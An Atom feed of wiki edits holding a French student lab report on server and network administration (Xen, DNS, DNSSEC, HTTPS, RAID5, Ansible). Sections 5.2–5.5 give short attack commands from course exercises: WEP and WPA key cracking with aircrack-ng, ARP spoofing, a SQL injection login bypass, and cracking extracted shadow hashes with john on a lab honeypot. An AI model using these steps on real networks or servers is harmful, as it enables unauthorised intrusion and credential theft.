<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="fr">
		<id>https://wiki-ima.plil.fr/mediawiki/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Ccalleri</id>
		<title>Wiki d'activités IMA - Contributions de l’utilisateur [fr]</title>
		<link rel="self" type="application/atom+xml" href="https://wiki-ima.plil.fr/mediawiki/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Ccalleri"/>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php/Sp%C3%A9cial:Contributions/Ccalleri"/>
		<updated>2026-09-21T07:04:38Z</updated>
		<subtitle>Contributions de l’utilisateur</subtitle>
		<generator>MediaWiki 1.29.2</generator>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G11&amp;diff=55168</id>
		<title>TP sysres IMA5sc 2020/2021 G11</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G11&amp;diff=55168"/>
				<updated>2020-12-22T01:04:07Z</updated>
		
		<summary type="html">&lt;p&gt;Ccalleri : /* 4.4  Sécurisation de serveur DNS par DNSSEC */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Sébastien DARDENNE - Corto CALLERISA&lt;br /&gt;
&lt;br /&gt;
=Adressage=&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! Domaine !! Distribution !! IP (privée) !! IP (publique) !! VLAN !! IPV4 !! IPV4 6509-E !! IPV4 C9200 !! IPV4 Routeur !! IPV6&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 11&lt;br /&gt;
| stropharia.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 100.64.0.18&lt;br /&gt;
| 193.48.57.178&lt;br /&gt;
| 311&lt;br /&gt;
| 10.60.111.0/24&lt;br /&gt;
| 10.60.111.1&lt;br /&gt;
| 10.60.111.2&lt;br /&gt;
| 10.60.111.254&lt;br /&gt;
| 2001:660:4401:60bd::0/64&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=Mise en place de la machine virtuelle Xen=&lt;br /&gt;
==Creation de la VM==&lt;br /&gt;
&lt;br /&gt;
Après nous être connecté sur le serveur capbreton.plil.fr, nous créons la machine virtuelle du TP avec la commande :&lt;br /&gt;
 root@capbreton:~# xen-create-image --hostname=stropharia --password=****** --ip=100.64.0.18 --gateway=100.64.0.5 --netmask=255.255.255.0 --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Cette commande spécifie les information de connexion à la VM ainsi que des informations réseau et la dernière version de Debian : Buster&lt;br /&gt;
&lt;br /&gt;
=Configuration OSPF sur 9200=&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                                                                                                                                  &lt;br /&gt;
 router-id 10.60.0.2                                  &lt;br /&gt;
 log-adjacency-changes                                                                                  &lt;br /&gt;
 summary-address 193.48.57.176 255.255.255.240                                                                                                                    &lt;br /&gt;
 summary-address 100.60.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
 summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                                  &lt;br /&gt;
 redistribute connected subnets                        &lt;br /&gt;
 redistribute static subnets route-map ospf                                                                                                                            &lt;br /&gt;
 network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
==Configuration LVM==&lt;br /&gt;
&lt;br /&gt;
Les disques de capbreton ont été initialisé pour l'utilisation avec LVM :&lt;br /&gt;
&lt;br /&gt;
 pvcreate /dev/sde&lt;br /&gt;
 pvcreate /dev/sdf&lt;br /&gt;
&lt;br /&gt;
Ces disques sont ensuite rassemblés dans le volume groupe storage :&lt;br /&gt;
 vgcreate storage /dev/sde /dev/sdf&lt;br /&gt;
&lt;br /&gt;
On obtient bien un groupe de 5.46 Tb :&lt;br /&gt;
 root@capbreton:~# vgdisplay storage&lt;br /&gt;
  --- Volume group ---&lt;br /&gt;
  VG Name               storage&lt;br /&gt;
  System ID             &lt;br /&gt;
  Format                lvm2&lt;br /&gt;
  Metadata Areas        2&lt;br /&gt;
  Metadata Sequence No  59&lt;br /&gt;
  VG Access             read/write&lt;br /&gt;
  VG Status             resizable&lt;br /&gt;
  MAX LV                0&lt;br /&gt;
  Cur LV                38&lt;br /&gt;
  Open LV               37&lt;br /&gt;
  Max PV                0&lt;br /&gt;
  Cur PV                2&lt;br /&gt;
  Act PV                2&lt;br /&gt;
  VG Size               &amp;lt;5.46 TiB&lt;br /&gt;
  PE Size               4.00 MiB&lt;br /&gt;
  Total PE              1430526&lt;br /&gt;
  Alloc PE / Size       69632 / 272.00 GiB&lt;br /&gt;
  Free  PE / Size       1360894 / 5.19 TiB&lt;br /&gt;
  VG UUID               eusQhE-lOxZ-cQqQ-uFxt-dYjG-LuwI-HL0flc&lt;br /&gt;
&lt;br /&gt;
On crée alors deux volumes logiques de 10 Go qui nous servirons de /var et /home :&lt;br /&gt;
&lt;br /&gt;
 lvcreate -L10G -n stropharia-home storage&lt;br /&gt;
 lvcreate -L10G -n stropharia-var storage&lt;br /&gt;
&lt;br /&gt;
Voici le résultat :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# lvdisplay | grep &amp;quot;stropharia&amp;quot; -A 15&lt;br /&gt;
  LV Path                /dev/storage/stropharia-home&lt;br /&gt;
  LV Name                stropharia-home&lt;br /&gt;
  VG Name                storage&lt;br /&gt;
  LV UUID                ofMU3m-QoN1-pZcA-32Dp-HJBN-ZNAn-O3awlc&lt;br /&gt;
  LV Write Access        read/write&lt;br /&gt;
  LV Creation host, time capbreton, 2020-10-12 17:40:11 +0200&lt;br /&gt;
  LV Status              available&lt;br /&gt;
  # open                 1&lt;br /&gt;
  LV Size                10.00 GiB&lt;br /&gt;
  Current LE             2560&lt;br /&gt;
  Segments               1&lt;br /&gt;
  Allocation             inherit&lt;br /&gt;
  Read ahead sectors     auto&lt;br /&gt;
  - currently set to     256&lt;br /&gt;
  Block device           254:18&lt;br /&gt;
   &lt;br /&gt;
  --- Logical volume ---&lt;br /&gt;
  LV Path                /dev/storage/stropharia-var&lt;br /&gt;
  LV Name                stropharia-var&lt;br /&gt;
  VG Name                storage&lt;br /&gt;
  LV UUID                8YAGLs-wD0c-6pSF-VEmC-wUfT-e9SI-8X9nFn&lt;br /&gt;
  LV Write Access        read/write&lt;br /&gt;
  LV Creation host, time capbreton, 2020-10-12 17:40:15 +0200&lt;br /&gt;
  LV Status              available&lt;br /&gt;
  # open                 1&lt;br /&gt;
  LV Size                10.00 GiB&lt;br /&gt;
  Current LE             2560&lt;br /&gt;
  Segments               1&lt;br /&gt;
  Allocation             inherit&lt;br /&gt;
  Read ahead sectors     auto&lt;br /&gt;
  - currently set to     256&lt;br /&gt;
  Block device           254:19&lt;br /&gt;
&lt;br /&gt;
==Mise en place des partitions==&lt;br /&gt;
On formate nos partitions au format ext4 :&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/storage/stropharia-home&lt;br /&gt;
 mkfs.ext4 /dev/storage/stropharia-var&lt;br /&gt;
&lt;br /&gt;
On note ces modifications dans /etc/xen/stropharia.cfg&lt;br /&gt;
&lt;br /&gt;
 disk       = [&lt;br /&gt;
              'file:/usr/local/xen/domains/trompettedelamort/disk.img,xvda2,w',&lt;br /&gt;
              'file:/usr/local/xen/domains/trompettedelamort/swap.img,xvda1,w',&lt;br /&gt;
              'phy:/dev/storage/trompettedelamort1,xvda3,w',&lt;br /&gt;
              'phy:/dev/storage/trompettedelamort2,xvda4,w'&lt;br /&gt;
            ]&lt;br /&gt;
&lt;br /&gt;
On lance maintenant la VM et l'on s'y connecte :&lt;br /&gt;
 xl create -c /etc/xen/stropharia.cfg&lt;br /&gt;
 xl console stropharia&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Après avoir monté et peuplé les partitions, on ajoute dans /etc/fstab&lt;br /&gt;
 /dev/xvda3 /home /ext4 default 0 2&lt;br /&gt;
 /dev/xvda4 /var /ext4 default 0 2&lt;br /&gt;
pour que le montage des partitions soit fait automatiquement à chaque démarrage.&lt;br /&gt;
&lt;br /&gt;
=4.1 Serveur SSH=&lt;br /&gt;
&lt;br /&gt;
Afin de rendre accessible notre VM par SSH, nous décommentons la ligne&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
du fichier sshd-config. On restart ensuite le service pour prendre en comte la modification avec la commande&lt;br /&gt;
 sytemctl restart sshd&lt;br /&gt;
On test la connection :&lt;br /&gt;
 $ ssh root@ns1.stropharia.site&lt;br /&gt;
 root@ns1.stropharia.site's password:&lt;br /&gt;
La connection ssh fonctionne donc.&lt;br /&gt;
Update : On peut aussi se connecter en avec&lt;br /&gt;
 ssh root@www.stropharia.site&lt;br /&gt;
&lt;br /&gt;
=4.2 Serveur DNS=&lt;br /&gt;
Nous configurons d'abord nos paramètres DNS dans gandi avant de confgurer la VM. &lt;br /&gt;
&lt;br /&gt;
Dans Glue Records nous ajoutons le namespace et son IP : ns1.stropharia.site / 193.48.57.178&lt;br /&gt;
Dans Name Server nous ajoutons ce DNS et le secondaire :&lt;br /&gt;
ns1.stropharia.site | ns6.gandi.net&lt;br /&gt;
&lt;br /&gt;
Nous allons utiliser l'implémentation open-source de DNS bind pour créer une association entre notre nom de domaine et l'IP de notre VM. &lt;br /&gt;
&lt;br /&gt;
On commence par créer le fichier /etc/bind/db.stropharia.site&lt;br /&gt;
 $include /etc/bind/stropharia.site.dnssec/stropharia.site-ksk.key&lt;br /&gt;
 $include /etc/bind/stropharia.site.dnssec/stropharia.site-zsk.key&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns1.stropharia.site. root.stropharia.site. (&lt;br /&gt;
                              13         ; Serial&lt;br /&gt;
                            3600         ; Refresh [1h]&lt;br /&gt;
                             600         ; Retry [10mn]&lt;br /&gt;
                           86400         ; Expire [1d]&lt;br /&gt;
                             600 )       ; Negative Cache TTL [1h]&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.stropharia.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 @       IN      MX      42 ns1&lt;br /&gt;
 ns1     IN      A       193.48.57.178&lt;br /&gt;
 www     IN      A       193.48.57.178&lt;br /&gt;
 ns1     IN      AAAA    2001:660:4401:60b2:216:3eff:fefb:8339&lt;br /&gt;
 www     IN      AAAA    2001:660:4401:60b2:216:3eff:fefb:8339&lt;br /&gt;
&lt;br /&gt;
Les parties mail et ipv6 font partie de la suite du TP, mais on peut voir les différents TTL pour le SOA (Start of Authority) ainsi que notre notre serveur de nom et l'adresse de l'hote.&lt;br /&gt;
&lt;br /&gt;
Afin d'avoir une trace personnelle, un record dans le fichier de zone à la forme suivante :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Format: !! host label!! ttl !! record class !! record type !! record data&lt;br /&gt;
|-&lt;br /&gt;
| Example:&lt;br /&gt;
| example.com&lt;br /&gt;
| 60&lt;br /&gt;
| IN&lt;br /&gt;
| A&lt;br /&gt;
| 104.255.228.125&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Et les différentes record types sont :&lt;br /&gt;
* A (Host address)&lt;br /&gt;
* AAAA (IPv6 host address)&lt;br /&gt;
* ALIAS (Auto resolved alias)&lt;br /&gt;
* CNAME (Canonical name for an alias)&lt;br /&gt;
* MX (Mail eXchange)&lt;br /&gt;
* NS (Name Server)&lt;br /&gt;
* PTR (Pointer)&lt;br /&gt;
* SOA (Start Of Authority)&lt;br /&gt;
* SRV (location of service)&lt;br /&gt;
* TXT (Descriptive text)&lt;br /&gt;
&lt;br /&gt;
On ajoute maintenant la zone dans le fichier /etc/bind/named.conf.local :&lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;stropharia.site&amp;quot; IN {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/db.stropharia.site.signed&amp;quot;;&lt;br /&gt;
         allow-transfer {217.70.177.40;};&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
(On utilise le fichier signé pour sécuriser l'accès https, fait par la suite)&lt;br /&gt;
&lt;br /&gt;
On modifie également le fichier named.conf.options :&lt;br /&gt;
 options {&lt;br /&gt;
         directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
         dnssec-validation auto;&lt;br /&gt;
         listen-on-v6 { any; };&lt;br /&gt;
         allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
         dnssec-enable yes;&lt;br /&gt;
 };&lt;br /&gt;
 acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
  217.70.177.40/32;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Afin d'autoriser le transfert des informations au DNS secondaire 217.70.177.40.&lt;br /&gt;
&lt;br /&gt;
On test alors la configuration :&lt;br /&gt;
 # host -t any stropharia.site ns6.gandi.net&lt;br /&gt;
 Using domain server:&lt;br /&gt;
 Name: ns6.gandi.net&lt;br /&gt;
 Address: 2001:4b98:d:1::40#53&lt;br /&gt;
 Aliases:&lt;br /&gt;
 stropharia.site mail is handled by 42 &lt;br /&gt;
 ns1.stropharia.site.&lt;br /&gt;
 stropharia.site name server ns1.stropharia.site.&lt;br /&gt;
 stropharia.site name server ns6.gandi.net.&lt;br /&gt;
 stropharia.site has SOA record ns1.stropharia.site. &lt;br /&gt;
 root.stropharia.site. 13 3600 600 86400 600&lt;br /&gt;
&lt;br /&gt;
On conclue que le DNS est fonctionne correctement.&lt;br /&gt;
&lt;br /&gt;
=4.3  Sécurisation de site web par certificat=&lt;br /&gt;
&lt;br /&gt;
Cette section décrit les étapes nécéssaire à la sécurisation par un accès https.&lt;br /&gt;
&lt;br /&gt;
Le résultat est le suivant : &lt;br /&gt;
[[Fichier:https_stropharia.png|400px]]&lt;br /&gt;
&lt;br /&gt;
==Procedure==&lt;br /&gt;
Dans cette partie nous suivons la procédure détaillée de gandi : https://docs.gandi.net/fr/ssl/operations_courantes/csr.html.&lt;br /&gt;
&lt;br /&gt;
Celle-ci consiste à générer les clés avec la commande &lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout stropharia.site.key -out stropharia.site.csr&lt;br /&gt;
&lt;br /&gt;
Et de demander à gandi de signer le certificat .csr afin d'obtenir le .crt. On note que le prix annoncé de 12€ passe à 0€ lors du paiement si c'est le premier.&lt;br /&gt;
&lt;br /&gt;
Avant de délivrer le certificat signé gandi doit vérifier que nous possédons bien le nom de domaine. Pour cela une des méthodes possibles est d'envoyer un mail à admin@stropharia.site.&lt;br /&gt;
&lt;br /&gt;
==Configuration du serveur de mail pour la vérification==&lt;br /&gt;
&lt;br /&gt;
Nous utilisons le programme postfix pour la récupération des mails.&lt;br /&gt;
&lt;br /&gt;
Après l'avoir installé nous ajoutons un un alias entre l'utilisateur admin et root afin de recevoir le mail de gandi sur un utilisateur existant.&lt;br /&gt;
&lt;br /&gt;
 #vi /etc/aliases&lt;br /&gt;
 # See man 5 aliases for format&lt;br /&gt;
 postmaster:    root&lt;br /&gt;
 admin:    root&lt;br /&gt;
&lt;br /&gt;
Afin de recevoir les mails nous ajoutons aussi la ligne suivante au fichier /etc/bind/db.stropharia.site&lt;br /&gt;
 @       IN      MX      42 ns1&lt;br /&gt;
&lt;br /&gt;
Pour l'agent de courriel nous utilsons Bsd-mailx :&lt;br /&gt;
 apt-get install -y bsd-mailx #install mailx&lt;br /&gt;
 postalias /etc/aliases # met à jour la base des alias pour prendre en compte admin:root&lt;br /&gt;
 mailx #lancement de la commande pour voir les mails recus&lt;br /&gt;
&lt;br /&gt;
On clique ensuite sur le lien et gandi et entrons le mot de passe de vérification reçu. Peut après on peut télécharger notre .crt ainsi que le fichier GandiStandardSSLCA2.pem.&lt;br /&gt;
&lt;br /&gt;
Finalement on place ces fichiers à coté de notre clé privée dans le répertoire /etc/ssl&lt;br /&gt;
 #ls /etc/ssl | less&lt;br /&gt;
 GandiStandardSSLCA2.pem&lt;br /&gt;
 certs&lt;br /&gt;
 openssl.cnf&lt;br /&gt;
 private&lt;br /&gt;
 stropharia.site.crt&lt;br /&gt;
 stropharia.site.key&lt;br /&gt;
&lt;br /&gt;
==Configuration d'apache2==&lt;br /&gt;
Une fois le CSR signé nous devons configurer apache 2 pour gérer du HTTPS sur le port 443.&lt;br /&gt;
&lt;br /&gt;
On commence par l'installer :&lt;br /&gt;
 apt install apache2&lt;br /&gt;
&lt;br /&gt;
puis on active le module ssl :&lt;br /&gt;
 a2enmod ssl&lt;br /&gt;
&lt;br /&gt;
On configure ensuite le fichier /etc/apache2/sites-enabled/000-default.conf pour rediriger le traffic http du port 80 vers le port 443 :&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
         ServerName www.stropharia.site&lt;br /&gt;
         '''Redirect / https://www.stropharia.site'''&lt;br /&gt;
         ServerAdmin webmaster@localhost&lt;br /&gt;
         DocumentRoot /var/www/html&lt;br /&gt;
         ...&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
et configurer les mots clés SSLCertificateKeyFile, SSLCertificateFile et SSLCertificateChainFile pour la connection sécurisé selon l'énoncé :&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost _default_:443&amp;gt;                                                     &lt;br /&gt;
   ServerName www.stropharia.site                                                &lt;br /&gt;
   DocumentRoot /var/www/html                                                    &lt;br /&gt;
   SSLEngine On                                                                  &lt;br /&gt;
   '''SSLCertificateFile''' /etc/ssl/stropharia.site.crt                               &lt;br /&gt;
   '''SSLCertificateKeyFile''' /etc/ssl/stropharia.site.key                            &lt;br /&gt;
   '''SSLCertificateChainFile''' /etc/ssl/GandiStandardSSLCA2.pem&lt;br /&gt;
   SSLVerifyClient None                                                          &lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons également un record dans le fichier /etc/bind/db.stropharia.site pour définir www.stropharia.site :&lt;br /&gt;
 www     IN      A       193.48.57.178&lt;br /&gt;
&lt;br /&gt;
On rédémarre le service apache&lt;br /&gt;
 service apache2 restart&lt;br /&gt;
et l'on vérifie en allant sur www.stropharia.site que nous somme bien redirigés sur le site https avec un certificat valide. (capture en haut de la section)&lt;br /&gt;
&lt;br /&gt;
=4.4  Sécurisation de serveur DNS par DNSSEC=&lt;br /&gt;
&lt;br /&gt;
Nous suivons à la lettre les 9 étapes de la procédure de l'ennoncé 4.4 : https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau004.html.&lt;br /&gt;
&lt;br /&gt;
De ce fait, après avoir généré nos clé, signé la zone et communiqué la partie publique de la clé KSK nous vérifions le résultat avec le site https://dnssec-analyzer.verisignlabs.com/ :&lt;br /&gt;
&lt;br /&gt;
[[Fichier:dns_stropharia.png|500px]]&lt;br /&gt;
&lt;br /&gt;
=5.1=&lt;br /&gt;
=5.2  Cassage de clef WEP d’un point d’accès WiFi=&lt;br /&gt;
&lt;br /&gt;
'''Voir la liste des interfaces'''&lt;br /&gt;
 airmon-ng&lt;br /&gt;
'''On passe notre interface en mode monitor'''&lt;br /&gt;
 airmon-ng start wlx40a5efd2140c&lt;br /&gt;
'''On lance un scran des réseaux wifi'''&lt;br /&gt;
 airmon-ng --encrypt wep wlan0mon&lt;br /&gt;
'''On capture les paquets'''&lt;br /&gt;
 airdump-ng --write crack11 --channel 3 --bssid 04:DA:D2:9C:50:5A wlan0mon&lt;br /&gt;
'''On lance le crack de la clé'''&lt;br /&gt;
 aircrack-ng -z crack11-01.cap&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [F1:DE:D4:00:00:00:00:0F:FF:FF:FF:FF:FF ]&lt;br /&gt;
=5.3=&lt;br /&gt;
'''Voir la liste des interfaces'''&lt;br /&gt;
 airmon-ng&lt;br /&gt;
'''On passe notre interface en mode monitor'''&lt;br /&gt;
 airmon-ng start wlx40a5efd2140c&lt;br /&gt;
'''On regarde les réseaux pour avoir le BSSID'''&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
'''On lance la commande capture sur le channel 5 et on attend le handshake'''&lt;br /&gt;
 airodump-ng --write donnees -c 5 --bssid 00:14:1B:60:8C:2A&lt;br /&gt;
'''Pendant ce temps-là, nous créons le dictionnaire pour le brutforce'''&lt;br /&gt;
 crunch 8 8 0123456789 &amp;gt; dictionnaire.txt&lt;br /&gt;
'''Pour gagner du temps, nous divisions ce dictionnaire en 4 parties'''&lt;br /&gt;
 split -l 25000000 dictionnaire.txt dictionnairediv.txt&lt;br /&gt;
&lt;br /&gt;
'''On lance le brutforce sur plusieurs machine'''&lt;br /&gt;
 aircrack-ng -a2 -b 00:14:1B:60:8C:2A -w dictionnairediv#.txt donnees-01.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:crackwpagrp11.jpg|600px]]&lt;br /&gt;
&lt;br /&gt;
=5.4 Attaque &amp;quot;homme au milieu&amp;quot;=&lt;br /&gt;
&lt;br /&gt;
Commande afin de voir les paquets entre la machine et le routeur&lt;br /&gt;
 arpspoof -i eth0 -t 172.26.145.57 172.26.145.254 &lt;br /&gt;
&lt;br /&gt;
Ensuite, on peut visualiser les paquets reçu avec wireshark.&lt;br /&gt;
&lt;br /&gt;
=5.5  Intrusion sur un serveur d’application Web=&lt;br /&gt;
&lt;br /&gt;
Sur site honey.plil.info, on exploite la faille avec une injection SQL dans l'id et le mdp:&lt;br /&gt;
 ' OR 1 = 1 --&lt;br /&gt;
&lt;br /&gt;
On constate qu'il y a un service SSH et un serveur apache avec la commande suivante:&lt;br /&gt;
 nmap -T4 -A honey.plil.info&lt;br /&gt;
&lt;br /&gt;
Avec l'utilisation des manuels on extrait le fichier de configuration phpmyadmin afin d'avoir les identifiants pour se connecter honey.plil.fr/phpmyadmin. Il est important de se connecter en root avec le même mdp.&lt;br /&gt;
&lt;br /&gt;
Dans la BDD, on retrouve un compte d'un utilisateur ayant les droits sur la machine. On se connecte donc en SSH avec son compte et on extrait les fichier password et shadow.&lt;br /&gt;
&lt;br /&gt;
Nous allons donc utiliser john pour trouver le mdp root. De plus, nous créons notre dictionnaire avec crunch et sed en utilisant l'indice du sujet.&lt;br /&gt;
&lt;br /&gt;
Je lance donc la commande suivante:&lt;br /&gt;
 john --wordlist=dictionnaire password.txt unshadow.txt &amp;gt; output.txt&lt;br /&gt;
&lt;br /&gt;
Mdp trouvé et connexion en root(Groupe11):&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Honeygroupe11.png]]&lt;br /&gt;
&lt;br /&gt;
=6.1 Installation Raid5=&lt;br /&gt;
&lt;br /&gt;
Création des partitions sur capbreton&lt;br /&gt;
 lvcreate -LG -n stropharia-part1 virtual&lt;br /&gt;
 lvcreate -LG -n stropharia-part2 virtual&lt;br /&gt;
 lvcreate -LG -n stropharia-part3 virtual&lt;br /&gt;
&lt;br /&gt;
Modification du fichier stropharia.cfg&lt;br /&gt;
 'phy:/dev/virtual/stropharia-part1,xvda5,w'&lt;br /&gt;
 'phy:/dev/virtual/stropharia-part2,xvda6,w'&lt;br /&gt;
 'phy:/dev/virtual/stropharia-part3,xvda7,w'&lt;br /&gt;
&lt;br /&gt;
On recrée notre VM&lt;br /&gt;
 xl destroy stropharia&lt;br /&gt;
 xl create -c /etc/xen/stropharia.cfg&lt;br /&gt;
&lt;br /&gt;
Création des volumes et formatage&lt;br /&gt;
 mdadm --create --verbose /dev/md0 --level=5 --raid-devices=3 /dev/xvda5 /dev/xvda6 /dev/xvda7&lt;br /&gt;
 mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
 mkds -t ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
Mount des partitions&lt;br /&gt;
 mount /dev/md0 /mnt&lt;br /&gt;
&lt;br /&gt;
Nous pouvons donc maintenant perdre un disque en gardant les données de la machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
=7.1 Architecture de la ferme= &lt;br /&gt;
&lt;br /&gt;
Création d'un bridge dans les paramètres de la machine virtuelle stropharia.&lt;br /&gt;
&lt;br /&gt;
Ajout d'une interface dans les 2 VM en modifiant /etc/network/interfaces.&lt;br /&gt;
&lt;br /&gt;
Ajout de la mascarade&lt;br /&gt;
 iptables -P FORWARD DROP&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -s 192.168.42.25 &lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -d 192.168.42.25 &lt;br /&gt;
 iptables -t nat -A POSTROUTING -j SNAT -s 192.168.42.25  --to 193.48.57.178&lt;br /&gt;
&lt;br /&gt;
Création de la clef publique et commande pour la transmettre aux VM.&lt;br /&gt;
&lt;br /&gt;
 cat ~/.ssh/id_rsa.pub | ssh username@remote_host &amp;quot;mkdir -p ~/.ssh &amp;amp;&amp;amp; cat &amp;gt;&amp;gt; ~/.ssh/authorized_keys&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Rôle motd (adriagalin.motd)&lt;br /&gt;
 ansible-galaxy install adriagalin.motd&lt;br /&gt;
&lt;br /&gt;
=7.2 Installation de docker= &lt;br /&gt;
Installation du rôle geerlingguy.docker&lt;br /&gt;
 ansible-galaxy install geerlingguy.docker&lt;br /&gt;
&lt;br /&gt;
Pour adapter le rôle à debian buster, il faut modifier les variables suivantes dans le playbook:&lt;br /&gt;
 docker_apt_gpg_key: https://download.docker.com/linux/debian/gpg&lt;br /&gt;
 docker_apt_repository: deb [arch=amd64] https://download.docker.com/linux/debian buster stable&lt;br /&gt;
&lt;br /&gt;
On peut donc lancer l'installation (uniquement sur stropharia)&lt;br /&gt;
 ansible-playbook dockerplaybook&lt;/div&gt;</summary>
		<author><name>Ccalleri</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:Dns_stropharia.png&amp;diff=55167</id>
		<title>Fichier:Dns stropharia.png</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:Dns_stropharia.png&amp;diff=55167"/>
				<updated>2020-12-22T01:03:11Z</updated>
		
		<summary type="html">&lt;p&gt;Ccalleri : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Ccalleri</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G11&amp;diff=55166</id>
		<title>TP sysres IMA5sc 2020/2021 G11</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G11&amp;diff=55166"/>
				<updated>2020-12-22T01:02:39Z</updated>
		
		<summary type="html">&lt;p&gt;Ccalleri : /* Configuration d'apache2 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Sébastien DARDENNE - Corto CALLERISA&lt;br /&gt;
&lt;br /&gt;
=Adressage=&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! Domaine !! Distribution !! IP (privée) !! IP (publique) !! VLAN !! IPV4 !! IPV4 6509-E !! IPV4 C9200 !! IPV4 Routeur !! IPV6&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 11&lt;br /&gt;
| stropharia.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 100.64.0.18&lt;br /&gt;
| 193.48.57.178&lt;br /&gt;
| 311&lt;br /&gt;
| 10.60.111.0/24&lt;br /&gt;
| 10.60.111.1&lt;br /&gt;
| 10.60.111.2&lt;br /&gt;
| 10.60.111.254&lt;br /&gt;
| 2001:660:4401:60bd::0/64&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=Mise en place de la machine virtuelle Xen=&lt;br /&gt;
==Creation de la VM==&lt;br /&gt;
&lt;br /&gt;
Après nous être connecté sur le serveur capbreton.plil.fr, nous créons la machine virtuelle du TP avec la commande :&lt;br /&gt;
 root@capbreton:~# xen-create-image --hostname=stropharia --password=****** --ip=100.64.0.18 --gateway=100.64.0.5 --netmask=255.255.255.0 --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Cette commande spécifie les information de connexion à la VM ainsi que des informations réseau et la dernière version de Debian : Buster&lt;br /&gt;
&lt;br /&gt;
=Configuration OSPF sur 9200=&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                                                                                                                                  &lt;br /&gt;
 router-id 10.60.0.2                                  &lt;br /&gt;
 log-adjacency-changes                                                                                  &lt;br /&gt;
 summary-address 193.48.57.176 255.255.255.240                                                                                                                    &lt;br /&gt;
 summary-address 100.60.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
 summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                                  &lt;br /&gt;
 redistribute connected subnets                        &lt;br /&gt;
 redistribute static subnets route-map ospf                                                                                                                            &lt;br /&gt;
 network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
==Configuration LVM==&lt;br /&gt;
&lt;br /&gt;
Les disques de capbreton ont été initialisé pour l'utilisation avec LVM :&lt;br /&gt;
&lt;br /&gt;
 pvcreate /dev/sde&lt;br /&gt;
 pvcreate /dev/sdf&lt;br /&gt;
&lt;br /&gt;
Ces disques sont ensuite rassemblés dans le volume groupe storage :&lt;br /&gt;
 vgcreate storage /dev/sde /dev/sdf&lt;br /&gt;
&lt;br /&gt;
On obtient bien un groupe de 5.46 Tb :&lt;br /&gt;
 root@capbreton:~# vgdisplay storage&lt;br /&gt;
